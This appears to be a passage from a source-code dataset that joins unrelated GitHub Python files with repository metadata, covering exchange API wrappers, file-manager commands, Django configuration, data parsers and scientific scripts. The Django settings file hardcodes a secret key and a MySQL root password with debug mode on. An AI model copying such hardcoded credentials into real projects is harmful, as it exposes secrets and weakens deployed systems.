"{:+9.4f}".format(w.std()),
])
display_table(table)
|
[
"noreply@github.com"
] |
himanshucodz55.noreply@github.com
|
e7b1a107e606889f4d2ea63f1cc95c913cd2cef3
|
13800b7827598e76428a335559b7bf11867ec2f0
|
/python/ccxt/async_support/binancecoinm.py
|
62ca72174bcc92699c5987d6f42bca5163a236e1
|
[
"MIT"
] |
permissive
|
ccxt/ccxt
|
b40a0466f5c430a3c0c6026552ae697aa80ba6c6
|
e4065f6a490e6fc4dd7a72b375428b2faa570668
|
refs/heads/master
| 2023-09-04T03:41:29.787733
| 2023-09-03T19:25:57
| 2023-09-03T19:25:57
| 91,253,698
| 30,798
| 8,190
|
MIT
| 2023-09-14T21:59:09
| 2017-05-14T15:41:56
|
Python
|
UTF-8
|
Python
| false
| false
| 1,683
|
py
|
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.binance import binance
from ccxt.abstract.binancecoinm import ImplicitAPI
class binancecoinm(binance, ImplicitAPI):
def describe(self):
return self.deep_extend(super(binancecoinm, self).describe(), {
'id': 'binancecoinm',
'name': 'Binance COIN-M',
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/117738721-668c8d80-b205-11eb-8c49-3fad84c4a07f.jpg',
'doc': [
'https://binance-docs.github.io/apidocs/delivery/en/',
'https://binance-docs.github.io/apidocs/spot/en',
],
},
'has': {
'CORS': None,
'spot': False,
'margin': False,
'swap': True,
'future': True,
'option': None,
'createStopMarketOrder': True,
},
'options': {
'fetchMarkets': ['inverse'],
'defaultSubType': 'inverse',
'leverageBrackets': None,
},
})
async def transfer_in(self, code: str, amount, params={}):
# transfer from spot wallet to coinm futures wallet
return await self.futuresTransfer(code, amount, 3, params)
async def transfer_out(self, code: str, amount, params={}):
# transfer from coinm futures wallet to spot wallet
return await self.futuresTransfer(code, amount, 4, params)
|
[
"travis@travis-ci.org"
] |
travis@travis-ci.org
|
215cc5ac5946240b17dc5fe3748953a92e0992d2
|
2dbcdf568b910af038f62a590e392c9c5d1a22a3
|
/.config/ranger/commands.py
|
6cb0560216bfbfff53a91008f2f4a07686ba4c4e
|
[] |
no_license
|
ianisl/dotfiles
|
ea6b9df7fe67a64d85bcbc5e87869415db2240d7
|
ad0f6908e3a01b7e6b21ab58dc6f73763c484399
|
refs/heads/master
| 2018-11-10T03:51:25.027073
| 2018-08-21T20:12:31
| 2018-08-21T20:12:31
| 116,000,595
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,701
|
py
|
from ranger.core.loader import CommandLoader
from ranger.api.commands import *
import os
class show_files_in_finder(Command):
"""
:show_files_in_finder
Present selected files in finder
"""
def execute(self):
import subprocess
files = ",".join(['"{0}" as POSIX file'.format(file.path) for file in self.fm.thistab.get_selection()])
reveal_script = "tell application \"Finder\" to reveal {{{0}}}".format(files)
activate_script = "tell application \"Finder\" to set frontmost to true"
script = "osascript -e '{0}' -e '{1}'".format(reveal_script, activate_script)
self.fm.notify(script)
subprocess.check_output(["osascript", "-e", reveal_script, "-e", activate_script])
class compress(Command):
def execute(self):
""" Compress marked files to current directory """
cwd = self.fm.thisdir
marked_files = cwd.get_selection()
if not marked_files:
return
def refresh(_):
cwd = self.fm.env.get_directory(original_path)
cwd.load_content()
original_path = cwd.path
parts = self.line.split()
au_flags = parts[1:]
descr = "compressing files in: " + os.path.basename(parts[1])
obj = CommandLoader(args=['apack'] + au_flags + \
[os.path.relpath(f.path, cwd.path) for f in marked_files], descr=descr)
obj.signal_bind('after', refresh)
self.fm.loader.add(obj)
def tab(self):
""" Complete with current folder name """
extension = ['.zip', '.tar.gz', '.rar', '.7z']
return ['compress ' + os.path.basename(self.fm.thisdir.path) + ext for ext in extension]
|
[
"ianis@ianislallemand.net"
] |
ianis@ianislallemand.net
|
0f375f087cd13a12480990221f7a3ae09da416aa
|
cde9386defde630e63c451d7ec49262bf25da615
|
/Closer_Django/CloserTest/settings.py
|
f1f6883bbafba09bb563960eccdcfefa36eda945
|
[] |
no_license
|
10356008/Closer
|
cd10467bded6f8b433896781e6513fd477f48845
|
fd73e67a0dfd953701ce4d031ac823b85f1ec054
|
refs/heads/master
| 2020-03-30T19:00:21.788899
| 2018-10-22T11:20:19
| 2018-10-22T11:20:19
| 151,190,485
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,450
|
py
|
"""
Django settings for CloserTest project.
Generated by 'django-admin startproject' using Django 2.0.6.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'bqgh%&hf8%gf3d1!2num2as1auyc1#0d$ujvw1%(rw$lld@&o&'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.admin',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'closer',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'CloserTest.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'CloserTest.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'closer',
'USER': 'root',
'PASSWORD': '10356031',
'HOST': '127.0.0.1',
'PORT': '3306',
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'zh-hant'
TIME_ZONE = 'Asia/Taipei'
USE_I18N = True
USE_L10N = True
USE_TZ = False
FILE_CHARSET = 'utf-8'
DEFAULT_CHARSET = 'utf-8'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
|
[
"10356008@ntub.edu.tw"
] |
10356008@ntub.edu.tw
|
6d88e628ec6020fa871cd1298584dd235cb3b37d
|
e494163449c50ee0251a12130f61d8f236e9b83c
|
/databases/trip-advisor/parser.py
|
79d9f0c635ef6401756cfe1d8aaf6c6c8e6fd5c3
|
[] |
no_license
|
prximenes/diversified-group-recommendation-
|
705d7a89441d750f358e4b162eacf775404a0de4
|
80e57ec259f0dfeaac96cbfb76d033cadb0f2474
|
refs/heads/master
| 2020-06-14T23:43:34.319101
| 2019-07-04T02:36:14
| 2019-07-04T02:36:14
| 195,156,475
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,479
|
py
|
#!/usr/bin/env python3
import pandas as pd
import numpy as np
import csv
import os
def add_hotel_info(filename):
datContent = [i.strip().split() for i in open(filename).readlines()]
hotel_id = filename.split('_')[1].split('.')[0]
for item in datContent:
if item != []:
if '<Overall' in item[0]:
if len(item) == 1:
ratings.append(item[0].split('>')[1])
#stuff.append(item[1].split('>')[1])
#print(item)
if 'Author' in item[0]:
users.append(item[0].split('>')[1])
hotels.append(hotel_id)
def get_list_from_csv(fp):
l = list()
with open(fp,'r') as fil:
in_reader = csv.reader(fil,delimiter=",")
for row in in_reader:
l.append(row)
return l
users = []
hotels = []
ratings = []
root = os.getcwd()
for filename in os.listdir(root):
if '.dat' in filename:
add_hotel_info(filename)
df = pd.DataFrame()
df['user_id'] = pd.Series(users)
df['item_id'] = pd.Series(hotels)
df['score'] = pd.Series(ratings)
target_dir = '../parsed-databases/'
csv_name = 'trip_advisor.csv'
if not os.path.exists(target_dir):
os.mkdir(target_dir)
df.to_csv(csv_name)
ls = get_list_from_csv(csv_name)
ls.pop(0)
with open(target_dir+csv_name, "w") as out_csv:
out_writer = csv.writer(out_csv)
for row in ls:
parsed_row = row[1:]
out_writer.writerow(parsed_row)
|
[
"prxc@cin.ufpe.br"
] |
prxc@cin.ufpe.br
|
97fc5940358187146b320b40cc7aa844e2cd0896
|
67c38bc13d2f9807cb4ccdc47a1e1d1f95527ebb
|
/urls.py
|
8978a3553f309e53e3a1bb3e40aa0ffadfd124a7
|
[] |
no_license
|
kimjung-eun/jungeun_finalproject2
|
baa1a5ac783a79b622f75223aa5d3f05a3e87228
|
c6b174a2bffa5d5d8348b2dd8f26dcf41061532f
|
refs/heads/master
| 2023-08-30T05:12:33.180239
| 2021-10-19T11:35:29
| 2021-10-19T11:35:29
| 418,885,301
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 815
|
py
|
"""finalproject2 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
import app.views
urlpatterns = [
path('admin/', admin.site.urls),
path('', app.views.home, name='home'),
]
|
[
"kje0293@naver.com"
] |
kje0293@naver.com
|
ddb0511c7da10557a74469f32fdf621eef3c6942
|
3a093f6a40e8fb24957d277ad8f4b097d08c6d04
|
/result_scons/tools/cards.py
|
289cbf4c6c50e49e16d0902fa369f486a474e093
|
[] |
no_license
|
dlont/FourTops2016
|
ab9e953760e93b0e777b23478938efd30d640286
|
88c929bf98625735a92a31210f7233f799c5a10c
|
refs/heads/master
| 2021-01-18T22:23:52.796080
| 2019-07-31T12:34:03
| 2019-07-31T12:34:03
| 72,439,490
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,985
|
py
|
#!/usr/bin/env python
"""
Script for Higgs Combine cards creation
"""
import os
import sys
import time
import argparse
import logging
import json
from datetime import datetime
import pandas as pd
import numpy as np
import ROOT
from cards_proc_list import proc_id
from cards_syst_list import systtypelist
from cards_syst_list import syst_norm_size_list, syst_shape_size_list
from cards_bin_list import binlist
#Global definitions
def getObservation(ch,file,observable):
'''
Fill per-bin datacounts list
'''
logging.debug("----getObservation:-----")
obs = {ch:{}}
for ibin in binlist[ch]:
histname = ibin.replace(ch,'') #Remove channel prefix e.g. mu6J2M->6J2M
histname = histname + '/' + observable
logging.debug("Observations filename: "+file.GetName())
logging.debug("Observations histname: "+histname)
integral = file.Get(histname).Integral()
logging.debug("Integral: "+str(integral))
obs[ch][ibin]=integral
return obs
def mcRate(ch,files,observable):
'''
Get MC predictions for each process
'''
logging.debug("----mcRate:-----")
rate = {}
logging.debug(files)
for proc in proc_id.keys():
rate[proc]=getObservation(ch,files[proc],observable)
return rate
def printCardHeader(arguments):
print >> arguments.outfile, '#',str(datetime.now()), arguments
print >> arguments.outfile, '-'*100
print >> arguments.outfile, 'imax', len(binlist[arguments.channel])
print >> arguments.outfile, 'jmax', len(proc_id)-1
print >> arguments.outfile, 'kmax', '*'
print >> arguments.outfile, '-'*100
def printShapeFilesBlock(arguments):
print >> arguments.outfile, '-'*100
for ibin in binlist[arguments.channel]:
histname = ibin.replace(arguments.channel,'')
histname = histname + '/' + arguments.observable
logging.debug(histname)
print >> arguments.outfile, 'shapes', 'data_obs', ibin, arguments.data, histname
for proc in proc_id.keys():
filename = arguments.sources[proc]
logging.debug(filename)
systname = ibin.replace(arguments.channel,'')+'_$SYSTEMATIC/'+arguments.observable
print >> arguments.outfile, 'shapes', proc, ibin, \
filename, histname, systname
print >> arguments.outfile, '-'*100
return
def main(arguments):
#pandas printing setting
pd.set_option('expand_frame_repr', False)
pd.set_option('max_columns', 999)
#Read-in input ROOT files
files = {}
for proc in arguments.sources.keys():
files[proc] = ROOT.TFile.Open(arguments.sources[proc],"READ")
printCardHeader(arguments)
printShapeFilesBlock(arguments)
#Get observations
datafile = ROOT.TFile.Open(arguments.data,"READ")
obs = getObservation(arguments.channel, datafile,arguments.observable)
logging.debug( obs )
#Printout observation block to file
obsline = pd.DataFrame(obs[arguments.channel], columns=binlist[arguments.channel], index=['observation'])
print >> arguments.outfile, '-'*100
print >> arguments.outfile, 'bin', obsline
print >> arguments.outfile, '-'*100
#Get MC rate predictions
rate = mcRate(arguments.channel,files,arguments.observable)
logging.debug( rate )
ch_dfs = []
for proc in proc_id.keys():
#Create new table for given process
s = pd.DataFrame('NA',
columns=binlist[arguments.channel],
index=systtypelist[arguments.channel].keys()
)
#Fill systematics desctiption for this process
#Normalization
df_update = pd.DataFrame.from_dict(syst_norm_size_list[arguments.channel][proc], orient='index')
df_update.columns = binlist[arguments.channel]
s.update(df_update)
#Shape
df_update = pd.DataFrame.from_dict(syst_shape_size_list[arguments.channel][proc], orient='index')
df_update.columns = binlist[arguments.channel]
s.update(df_update)
#Add process labels and id (first and second line, respectively)
processline = pd.DataFrame(proc, columns=binlist[arguments.channel], index=['process'])
s = pd.concat([s.ix[:0], processline, s.ix[0:]])
processline = pd.DataFrame(proc_id[proc], columns=binlist[arguments.channel], index=['process '])
s = pd.concat([s.ix[:1], processline, s.ix[1:]])
rateline = pd.DataFrame(rate[proc][arguments.channel], columns=binlist[arguments.channel], index=['rate'])
s = pd.concat([s.ix[:2], rateline, s.ix[2:]])
print arguments.channel, proc
logging.debug(s)
ch_dfs.append(s)
result = pd.concat(ch_dfs,axis=1)
#Add column with systematic type (normalization or shape)
lam = lambda x: systtypelist[arguments.channel][x] if x in systtypelist[arguments.channel] else ''
result.insert(0,' ',result.index.map(lam))
#Printout MC (rate and systematics) block to file
print >> arguments.outfile, 'bin', result
return 0
if __name__ == '__main__':
start_time = time.time()
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('--data', help="Data rootfile", required=True)
parser.add_argument("--source", type=json.loads, dest='sources',
help='json dictionary with input definition', required=True)
parser.add_argument('--channel', help="channel",default='mu')
parser.add_argument('--observable', help="observable",default='allSF/bdt')
parser.add_argument('-o', '--outfile', help="Output file",
default=sys.stdout, type=argparse.FileType('w'))
parser.add_argument(
'-d', '--debug',
help="Print lots of debugging statements",
action="store_const", dest="loglevel", const=logging.DEBUG,
default=logging.WARNING,
)
parser.add_argument(
'-v', '--verbose',
help="Be verbose",
action="store_const", dest="loglevel", const=logging.INFO,
)
args = parser.parse_args(sys.argv[1:])
print(args)
logging.basicConfig(level=args.loglevel)
logging.info( time.asctime() )
exitcode = main(args)
logging.info( time.asctime() )
logging.info( 'TOTAL TIME IN MINUTES:' + str((time.time() - start_time) / 60.0))
sys.exit(exitcode)
|
[
"denys.lontkovskyi@cern.ch"
] |
denys.lontkovskyi@cern.ch
|
ca740ae582457f4d38da6e850951c4b048df0f9b
|
e3fbf247380f21bb309c5fb85620a32c7c0a73ac
|
/docservice/fonts/font_utils.py
|
017b9671a745162110c69526a082053bc52486cd
|
[
"MIT"
] |
permissive
|
kumardeepak/ExportPDF
|
59cad27a6072ca31f63d82ac07f91fe1b273b350
|
b336afaf1c023d156e9df3e3f608b8d9366d635a
|
refs/heads/master
| 2023-03-31T00:17:24.397189
| 2021-04-09T06:13:00
| 2021-04-09T06:13:00
| 346,559,150
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 309
|
py
|
import os
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
class FontUtils(object):
@classmethod
def load_font(self, font_name='arial-unicode-ms'):
pdfmetrics.registerFont(TTFont(font_name, os.path.join(os.getcwd(), 'fonts', font_name + '.ttf')))
|
[
"0xbeefdead@gmail.com"
] |
0xbeefdead@gmail.com
|
6111b1bc7f4ae1ae73387fba875d19819f819d5b
|
aa7d7099e4d3fede60a177c962f548dbdf1e213e
|
/utils/clean_ts.py
|
16c579615c24607be97305ac6622a15a45050734
|
[
"MIT"
] |
permissive
|
NieYi/PyGdalSAR
|
f7f1ea0b9e3e961438c5f47357e3ec2fd2cf8411
|
7fcda1d927d1274f5419760efb7c0707ae1d44ef
|
refs/heads/master
| 2020-05-27T09:22:55.588790
| 2019-05-23T11:53:43
| 2019-05-23T11:53:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,706
|
py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
############################################
#
# PyGdalSAR: An InSAR post-processing package
# written in Python-Gdal
#
############################################
# Author : Simon DAOUT (Oxford)
############################################
"""\
clean_ts.py
-------------
Clean a time series file (cube in binary format) given an other real4 file (mask) and a threshold on this mask
Usage: clean_ts.py --infile=<path> --mask=<path> --threshold=<value> --outfile=<path> \
[--perc=<value>] [--vmin=<value>] [--vmax=<value>] [--rampmask=<yes/no>] \
[--flatten_mask=<path>] [--lectfile=<path>] [--scale=<value>] [--imref=<value>] \
[--images=<path>] [--clean=<values>] [--crop=<values>] [--clean_demerr=<path>]
Options:
-h --help Show this screen.
--infile PATH path to time series (depl_cumule)
--outfile PATH output file
--mask PATH r4 file used as mask
--flatten_mask PATH output r4 flatten mask [default: None]
--rampmask VALUE flatten mask [default: yes]
--threshold VALUE threshold value on mask file (Keep pixel with mask > threshold)
--scale VALUE scale the mask [default:1]
--lectfile PATH Path of the lect.in file [default: lect.in]
--imref VALUE Reference image number [default: 1]
--images PATH Path to image_retuenues file [default: images_retenues]
--clean VALUE Clean option [default: 0,0,0,0]
--crop VALUE Crop option [default: 0,nlign,0,ncol]
--vmax Max colorscale [default: 98th percentile]
--vmin Min colorscale [default: 2th percentile]
--perc VALUE Percentile of hidden LOS pixel for the estimation and clean outliers [default:99.9]
--clean_demerr Path to dem error file
"""
# numpy
import numpy as np
from numpy.lib.stride_tricks import as_strided
import os
import matplotlib as mpl
from matplotlib import pyplot as plt
import matplotlib.cm as cm
from pylab import *
# scipy
import scipy
import scipy.optimize as opt
import scipy.linalg as lst
import docopt
arguments = docopt.docopt(__doc__)
infile = arguments["--infile"]
outfile = arguments["--outfile"]
maskf = arguments["--mask"]
seuil = float(arguments["--threshold"])
if arguments["--rampmask"] == None:
rampmask = "no"
else:
rampmask = arguments["--rampmask"]
if arguments["--lectfile"] == None:
lecfile = "lect.in"
else:
lecfile = arguments["--lectfile"]
if arguments["--scale"] == None:
scale = 1.
else:
scale = float(arguments["--scale"])
if arguments["--imref"] == None:
imref = 0
elif arguments["--imref"] < 1:
print '--imref must be between 1 and Nimages'
else:
imref = int(arguments["--imref"]) - 1
# read lect.in
ncol, nlign = map(int, open(lecfile).readline().split(None, 2)[0:2])
if arguments["--clean"] == None:
mask = [0,0,0,0]
else:
print arguments["--clean"]
mask = map(float,arguments["--clean"].replace(',',' ').split())
mibeg,miend,mjbeg,mjend = int(mask[0]),int(mask[1]),int(mask[2]),int(mask[3])
if arguments["--crop"] == None:
crop = [0,nlign,0,ncol]
else:
crop = map(float,arguments["--crop"].replace(',',' ').split())
ibeg,iend,jbeg,jend = int(crop[0]),int(crop[1]),int(crop[2]),int(crop[3])
if arguments["--perc"] == None:
perc = 99.9
else:
perc = float(arguments["--perc"])
if arguments["--clean_demerr"] == None:
demf = 'no'
dem = np.zeros((nlign,ncol))
else:
demf = arguments["--clean_demerr"]
extension = os.path.splitext(demf)[1]
if extension == ".tif":
ds = gdal.Open(demf, gdal.GA_ReadOnly)
dem = ds.GetRasterBand(1).ReadAsArray()
else:
dem = np.fromfile(demf,dtype=np.float32).reshape((nlign,ncol))
# load images_retenues file
fimages='images_retenues'
nb,idates,dates,base=np.loadtxt(fimages, comments='#', usecols=(0,1,3,5), unpack=True,dtype='i,i,f,f')
# nb images
N=len(dates)
print 'Number images: ', N
# open mask file
mask = np.zeros((nlign,ncol))
fid2 = open(maskf, 'r')
mask = np.fromfile(fid2,dtype=np.float32).reshape((nlign,ncol))
mask = mask*scale
kk = np.nonzero(np.logical_or(mask==0.0, mask>999.))
mask[kk] = float('NaN')
if rampmask=='yes':
index = np.nonzero( ~np.isnan(mask))
temp = np.array(index).T
maski = mask[index].flatten()
az = temp[:,0]; rg = temp[:,1]
G=np.zeros((len(maski),5))
G[:,0] = rg**2
G[:,1] = rg
G[:,2] = az**2
G[:,3] = az
G[:,4] = 1
x0 = lst.lstsq(G,maski)[0]
_func = lambda x: np.sum(((np.dot(G,x)-maski))**2)
_fprime = lambda x: 2*np.dot(G.T, (np.dot(G,x)-maski))
pars = opt.fmin_slsqp(_func,x0,fprime=_fprime,iter=200,full_output=True,iprint=0)[0]
pars = np.dot(np.dot(np.linalg.inv(np.dot(G.T,G)),G.T),maski)
a = pars[0]; b = pars[1]; c = pars[2]; d = pars[3]; e = pars[4]
print 'Remove ramp mask %f x**2 %f x + %f y**2 + %f y + %f for : %s'%(a,b,c,d,e,maskf)
G=np.zeros((len(mask.flatten()),5))
for i in xrange(nlign):
G[i*ncol:(i+1)*ncol,0] = np.arange((ncol))**2
G[i*ncol:(i+1)*ncol,1] = np.arange((ncol))
G[i*ncol:(i+1)*ncol,2] = i**2
G[i*ncol:(i+1)*ncol,3] = i
G[:,4] = 1
temp = (mask.flatten() - np.dot(G,pars))
maskflat=temp.reshape(nlign,ncol)
# maskflat = (temp - np.nanmin(temp)).reshape(nlign,ncol)
else:
# pass
maskflat = np.copy(mask)
vmax = np.nanpercentile(maskflat,99)
vmax=1
kk = np.nonzero(maskflat>seuil)
spacial_mask = np.copy(maskflat)
spacial_mask[kk] = float('NaN')
nfigure=0
fig = plt.figure(0,figsize=(9,4))
ax = fig.add_subplot(1,3,1)
cax = ax.imshow(mask,cmap=cm.jet,vmax=vmax,vmin=0)
ax.set_title('RMSpixel')
setp( ax.get_xticklabels(), visible=False)
fig.colorbar(cax, orientation='vertical',aspect=10)
ax = fig.add_subplot(1,3,2)
cax = ax.imshow(maskflat,cmap=cm.jet,vmax=vmax,vmin=0)
ax.set_title('flat RMSpixel')
setp( ax.get_xticklabels(), visible=False)
fig.colorbar(cax, orientation='vertical',aspect=10)
ax = fig.add_subplot(1,2,2)
cax = ax.imshow(spacial_mask,cmap=cm.jet,vmax=vmax,vmin=0)
ax.set_title('Mask')
setp( ax.get_xticklabels(), visible=False)
fig.colorbar(cax, orientation='vertical',aspect=10)
del spacial_mask, mask
# plt.show()
# sys.exit()
if arguments["--flatten_mask"] != None:
# save clean ts
fid = open(arguments["--flatten_mask"], 'wb')
maskflat.flatten().astype('float32').tofile(fid)
fid.close()
# lect cube
cubei = np.fromfile(infile,dtype=np.float32)
cube = as_strided(cubei[:nlign*ncol*N])
kk = np.flatnonzero(np.logical_or(cube==9990, cube==9999))
cube[kk] = float('NaN')
_cube=np.copy(cube)
_cube[cube==0] = np.float('NaN')
maxlos,minlos=np.nanpercentile(_cube,perc),np.nanpercentile(_cube,(100-perc))
print maxlos,minlos
# sys.exit()
print 'Number of line in the cube: ', cube.shape
maps = cube.reshape((nlign,ncol,N))
print 'Reshape cube: ', maps.shape
# set at NaN zero values for all dates
kk = np.nonzero(
np.logical_or(maps[:,:,-1]<minlos,
np.logical_or(maps[:,:,-1]>maxlos,
# np.logical_or(maps[:,:,-1]==0,
maskflat>seuil
)))
# )
# clean
cst = np.copy(maps[:,:,imref])
for l in xrange((N)):
d = as_strided(maps[:,:,l])
d[kk] = np.float('NaN')
# carefull stupid unit
maps[:,:,l] = maps[:,:,l] - cst - dem*(base[l]-base[imref])/100.
if l != imref:
index = np.nonzero(d==0.0)
d[index] = np.float('NaN')
maps[mibeg:miend,mjbeg:mjend,l] = np.float('NaN')
if arguments["--vmax"] == None:
vmax = np.nanpercentile(maps, 98)*4.4563
else:
vmax = np.float(arguments["--vmax"])
if arguments["--vmin"] == None:
vmin = np.nanpercentile(maps, 2)*4.4563
else:
vmin = np.float(arguments["--vmin"])
# save clean ts
fid = open(outfile, 'wb')
maps.flatten().astype('float32').tofile(fid)
fid.close()
# plot diplacements maps
fig = plt.figure(1,figsize=(14,10))
fig.subplots_adjust(wspace=0.001)
# vmax = np.abs([np.nanmedian(maps[:,:,-1]) + 1.*np.nanstd(maps[:,:,-1]),\
# np.nanmedian(maps[:,:,-1]) - 1.*np.nanstd(maps[:,:,-1])]).max()
# vmin = -vmax
for l in xrange((N)):
d = as_strided(maps[ibeg:iend,jbeg:jend,l])*4.4563
#ax = fig.add_subplot(1,N,l+1)
ax = fig.add_subplot(4,int(N/4)+1,l+1)
#cax = ax.imshow(d,cmap=cm.jet,vmax=vmax,vmin=vmin)
cmap = cm.jet
cmap.set_bad('white')
cax = ax.imshow(d,cmap=cm.jet,vmax=vmax,vmin=vmin)
ax.set_title(idates[l],fontsize=6)
setp( ax.get_xticklabels(), visible=False)
setp( ax.get_yticklabels(), visible=False)
setp(ax.get_xticklabels(), visible=False)
setp(ax.get_yticklabels(), visible=False)
fig.tight_layout()
plt.suptitle('Time series maps')
fig.colorbar(cax, orientation='vertical',aspect=10)
fig.savefig('maps_clean.eps', format='EPS',dpi=150)
plt.show()
|
[
"simondaout@gmail.com"
] |
simondaout@gmail.com
|
efbbc357d3a95af5916f903b84babff1014b4d80
|
8b115f778e05db8ae4a4cdc412c4d18e31342b3f
|
/Projects/Simulation/gradSearchNonstop.py
|
fc69cfa2877dd23cfb79545eecdc565a7c3b815a
|
[] |
no_license
|
njian/bikesharSimOpt
|
a6bee8aa8dd066c57722c6977de1f9a938f54992
|
053f7e53a87f9a0ad86faaa77126a6c1392166a3
|
refs/heads/master
| 2021-03-30T18:04:06.260084
| 2017-08-04T03:35:59
| 2017-08-04T03:35:59
| 42,687,690
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,682
|
py
|
import SimulationRunner_v2 as SimulationRunner
import math, random
import numpy
import time
import cPickle
from collections import Counter
import logging
def simulate(level, sM, durations, rep, seed, mbm, simMethod, startTime, numIntervals):
t0 = time.time()
numpy.random.seed(seed) # starting seed for round of reps
soln = 0
s1 = []
s2 = []
solutionList = []
solutionList2 = []
for i in range(rep):
data = SimulationRunner.testVehicles2(level, sM, mbm, durations, simMethod, startTime, numIntervals)
solutionList.append(data)
solutionList2.append(float(sum(data[0:3])))
if data[3] != -1:
s1.extend(data[3]) # all failed start sids in this rep
if data[4] != -1:
s2.extend(data[4]) # all failed end sids in this rep
obj = round(numpy.mean(solutionList2, axis=0), 2)
ciwidth = round(numpy.std(solutionList2)*1.96/numpy.sqrt(rep), 2)
statE = Counter(s1).most_common() # produces a list with [0]=sid and [1]=failedStarts
statF = Counter(s2).most_common() # produces a list with [0]=sid and [1]=failedEnds
# print "Most common failed starts: ", statE
# print "Most common failed ends: ", statF
print "time in simulate() ", time.time() - t0, " with rep ", rep
return (solutionList, obj, ciwidth, statE, statF)
# return (obj, ciwidth)
def storePickle(results, level, fileName):
''' Store pickle '''
fileName1 = ("./outputsDO/%s.p" % (fileName + 'Results'))
fileName2 = ("./outputsDO/%s.p" % (fileName + 'Level'))
cPickle.dump(results, open(fileName1, 'wb'))
cPickle.dump(level, open(fileName2, 'wb'))
# Basic Solution: randomSearch start of code
def basicSoln(sM, mbm, daySeed, reps, simMethod = "AltCond", startTime = 420, numIntervals = 4):
logger1 = logging.getLogger('gradSearch')
sidList = []
level = {}
# Read solution
for sid in sM:
sidList.append(sid)
level[sid] = sM[sid]['bikes']
start = time.time()
objAll, obj0, ciwidth, statE, statF = simulate(level, sM, reps, daySeed, mbm, simMethod, startTime, numIntervals)
end = time.time()
runTime = round(end - start,3)
return runTime, obj0, ciwidth
def randomSearch(sM, mbm, durations, startTime, numIntervals, config):
''' Configurations '''
nswap = 1 # initial number to swap in each iteration
logger1 = logging.getLogger('gradSearch_v2')
daySeed = config[0]
listLength = config[1]
simulationMethod = config[2]
randomSwap = config[3]
rep = config[4]
logger1 = logging.getLogger('gradSearch_v2')
start = time.time()
simCount = 0 # count of total simulation days
diff = -1
sidList = []
level = {}
# Read solution
for sid in sM:
sidList.append(sid)
level[sid] = sM[sid]['bikes']
obj1 = 0.0
objAll, obj0, ciwidth, statE, statF = simulate(level, sM, durations, 50, daySeed, mbm, simMethod, startTime, numIntervals)
logger1.warning( ("Obj0: " + str(obj0) + " ciwidth " + str(ciwidth)) )
obj00 = obj0
ciwidth00 = ciwidth
results = {}
results[0] = objAll
# proceed = 1
seed = daySeed # random seed
failedswap = 0
failedSinceLastChange = 0
improve = -999
while True: # Stopping criteria
try:
''' Decrease the number of swaps adaptively '''
# if failedSinceLastChange > 150 and nswap - 1 >= 1:
# nswap -= 1
